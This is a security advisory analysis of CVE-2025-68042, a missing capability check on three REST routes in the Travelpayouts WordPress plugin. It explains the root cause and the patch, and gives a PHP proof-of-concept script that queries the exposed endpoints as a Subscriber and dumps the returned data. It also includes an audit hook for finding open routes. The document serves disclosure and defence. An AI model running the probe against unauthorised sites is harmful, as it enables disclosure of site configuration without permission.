Atomic Edge analysis of CVE-2025-68042:
This vulnerability is a missing authorization flaw in the Travelpayouts WordPress plugin. Three of the plugin's REST API routes were registered without a capability check, so any authenticated user, down to the Subscriber role, could call endpoints intended for administrators. The CVSS score of 4.3 reflects that the attacker needs an account on the site and that the outcome is disclosure of plugin configuration rather than code execution or privilege escalation.

Root Cause:
The vulnerability existed in the `rest_api_init` method of the `Travelpayouts_REST_API_Builder` class. Three REST API routes registered in `/travelpayouts/redux-core/inc/classes/class-travelpayouts-rest-api-builder.php` used `'permission_callback' => '__return_true'` (lines 60, 75, and 90 in the vulnerable version). This granted unconditional access to the `/fields`, `/fields/(?P<id>[\w-_/]+)`, and `/fields/(?P<id>[\w-_/]+)/render` endpoints. `__return_true` is the WordPress sentinel for "no permission check at all": it does not by itself require a logged-in user, so nothing in the route registration stood between a request and the handler. The advisory scopes the issue to authenticated WordPress users, who could invoke these administrative functions without holding any administrative capability.

Exploitation:
An attacker holding Subscriber-level credentials could send plain GET requests to the three routes. The primary target is `/wp-json/travelpayouts/v1/fields`, which lists the plugin's configuration fields; `/wp-json/travelpayouts/v1/fields/{id}` returns the data of one field and `/wp-json/travelpayouts/v1/fields/{id}/render` renders that field's component. No request parameters are needed beyond being authenticated, because the flaw is the absence of any authorization check rather than a parsing or validation bug. One practical detail: the WordPress REST API treats a cookie session as anonymous unless the request carries a valid `X-WP-Nonce` header (nonce action `wp_rest`), so an attacker either obtains that nonce from a page served to the logged-in account or authenticates with an Application Password over HTTP Basic auth.
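The following script is an added example for this analysis, not code from the advisory or from the plugin. It issues the three GET requests just described against a site you are authorised to test, authenticating as a low-privilege account with a WordPress Application Password over HTTP Basic auth, and classifies the HTTP status the way WordPress's REST layer produces it. The base URL, username, Application Password and field id are placeholders supplied on the command line; the response body shape is whatever the plugin returns and is printed as-is.

```php
<?php
// Added example, not the advisory's or the plugin's code.
// Usage: php tp_fields_check.php https://example.test subscriber 'xxxx xxxx xxxx' [field-id]
// All four arguments are placeholders you supply for a site you may test.

function tp_rest_get( string $base_url, string $path, string $user, string $app_password ): array {
    // Namespace and paths are taken from the endpoint URLs in the advisory.
    $url = rtrim( $base_url, '/' ) . '/wp-json/travelpayouts/v1' . $path;
    $ch  = curl_init( $url );
    curl_setopt_array( $ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HTTPAUTH       => CURLAUTH_BASIC,          // Application Password auth
        CURLOPT_USERPWD        => $user . ':' . $app_password,
        CURLOPT_HTTPHEADER     => [ 'Accept: application/json' ],
        CURLOPT_TIMEOUT        => 15,
    ] );
    $body   = curl_exec( $ch );
    $status = (int) curl_getinfo( $ch, CURLINFO_RESPONSE_CODE );
    $error  = curl_error( $ch );
    curl_close( $ch );
    return [
        'url'    => $url,
        'status' => $status,
        'error'  => $error,
        'body'   => json_decode( (string) $body, true ),
    ];
}

// A permission_callback that returns false makes WordPress answer with error
// code "rest_forbidden": HTTP 401 for anonymous callers, HTTP 403 for
// authenticated callers lacking the capability. A 200 for a Subscriber means
// the route is still served without a capability check.
function tp_classify( array $r ): string {
    if ( $r['error'] !== '' ) {
        return 'transport error: ' . $r['error'];
    }
    switch ( $r['status'] ) {
        case 200:
            return 'ACCESSIBLE to this account (pre-1.2.2 behaviour)';
        case 403:
            return 'blocked: capability check in place for this account';
        case 401:
            return 'unauthenticated: credentials not accepted (check the Application Password)';
        case 404:
            return 'route not found: plugin inactive, REST disabled, or different namespace';
        default:
            return 'unexpected HTTP ' . $r['status'];
    }
}

if ( PHP_SAPI === 'cli' && isset( $argv[3] ) ) {
    [ , $base, $user, $pass ] = $argv;
    $paths = [ '/fields' ];
    if ( isset( $argv[4] ) ) {
        // The route pattern allows '/' inside the id, so it is appended unencoded.
        $paths[] = '/fields/' . $argv[4];
        $paths[] = '/fields/' . $argv[4] . '/render';
    }
    foreach ( $paths as $p ) {
        $r = tp_rest_get( $base, $p, $user, $pass );
        printf( "%-70s %3d  %s\n", $r['url'], $r['status'], tp_classify( $r ) );
        if ( 200 === $r['status'] ) {
            echo json_encode( $r['body'], JSON_PRETTY_PRINT ), "\n";
        }
    }
}
```

Run it once with a Subscriber account and once with an Administrator: on a patched site the Subscriber gets 403 on all three routes while the Administrator gets 200, which distinguishes the fix from the routes simply being absent (404).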

Patch Analysis:
The patch replaces the `'permission_callback' => '__return_true'` entries with a capability check. Version 1.2.2 introduces a closure, `$perm`, that returns `current_user_can('manage_options')` (line 53), and assigns that closure to all three REST route registrations (lines 60, 75, and 90). Endpoint access is therefore restricted to users holding the `manage_options` capability, which by default is only the Administrator role (and Super Admins on multisite); when the closure returns false, WordPress answers with `rest_forbidden` (HTTP 401 for anonymous callers, 403 for authenticated callers without the capability). The version constant in `/travelpayouts/definitions.php` was also updated from 1.2.1 to 1.2.2.
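The following block is an added example written for this analysis; it is not the plugin's code. It shows the vulnerable and the patched shape of the route registration described in the Root Cause and Patch Analysis sections, and adds a site-wide check a reviewer can drop into a must-use plugin to list every REST route that still relies on `__return_true` (or omits the permission callback, which WordPress treats the same way). The namespace `travelpayouts/v1` is taken from the endpoint URLs above; the handler names, the placeholder payloads and the audit function are assumptions for illustration.

```php
<?php
// Added example, not the plugin's own code. Handler names and payloads are
// placeholders; the registration shape is what the advisory describes.

function tp_example_get_fields( WP_REST_Request $req ) {
    return rest_ensure_response( array( 'fields' => array() ) );     // placeholder payload
}
function tp_example_get_field( WP_REST_Request $req ) {
    return rest_ensure_response( array( 'id' => $req['id'] ) );      // placeholder payload
}

// Pre-1.2.2 pattern. '__return_true' is the "no permission check" sentinel:
// the route is served to anyone, logged in or not. Left unhooked; shown only
// for comparison with the fixed version below.
function tp_example_register_routes_vulnerable() {
    register_rest_route( 'travelpayouts/v1', '/fields', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'tp_example_get_fields',
        'permission_callback' => '__return_true',
    ) );
}

// 1.2.2 pattern: one closure, reused on every route, requiring manage_options.
// Returning false makes WordPress reply rest_forbidden (401 anonymous, 403 logged in).
function tp_example_register_routes_fixed() {
    $perm = function () {
        return current_user_can( 'manage_options' );
    };
    $id_pattern = '(?P<id>[\w-_/]+)';   // field id shape from the advisory's route list

    register_rest_route( 'travelpayouts/v1', '/fields', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'tp_example_get_fields',
        'permission_callback' => $perm,
    ) );
    register_rest_route( 'travelpayouts/v1', '/fields/' . $id_pattern, array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'tp_example_get_field',
        'permission_callback' => $perm,
    ) );
    register_rest_route( 'travelpayouts/v1', '/fields/' . $id_pattern . '/render', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'tp_example_get_field',
        'permission_callback' => $perm,
    ) );
}
add_action( 'rest_api_init', 'tp_example_register_routes_fixed' );

// Check: after every plugin has registered its routes, return each route/method
// whose permission_callback is '__return_true' or missing, so a reviewer can
// confirm the fix is live and see what else on the site is exposed the same way.
function tp_example_open_routes( WP_REST_Server $server ): array {
    $open = array();
    foreach ( $server->get_routes() as $route => $handlers ) {
        foreach ( $handlers as $handler ) {
            $cb = $handler['permission_callback'] ?? null;
            if ( null === $cb || '__return_true' === $cb ) {
                // register_route() normalises 'methods' into an array keyed by verb.
                $verbs  = implode( ',', array_keys( (array) $handler['methods'] ) );
                $open[] = $route . ' [' . $verbs . ']';
            }
        }
    }
    return $open;
}
add_action( 'rest_api_init', function ( WP_REST_Server $server ) {
    foreach ( tp_example_open_routes( $server ) as $line ) {
        error_log( 'REST route without permission check: ' . $line );
    }
}, PHP_INT_MAX );
```

Some routes are legitimately public and will show up in the audit output; the point is that `/travelpayouts/v1/fields...` must not, and that any other entry gets a deliberate decision rather than the default.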

Impact:
Successful exploitation allows any authenticated user, down to the Subscriber role, to read plugin configuration data through the REST API. This could expose sensitive plugin settings, widget configurations, and integration parameters. While the vulnerability does not directly enable privilege escalation or remote code execution, it violates the principle of least privilege and could facilitate reconnaissance for further attacks. Sites should update to version 1.2.2 or later; until then the endpoints remain reachable by every account holder.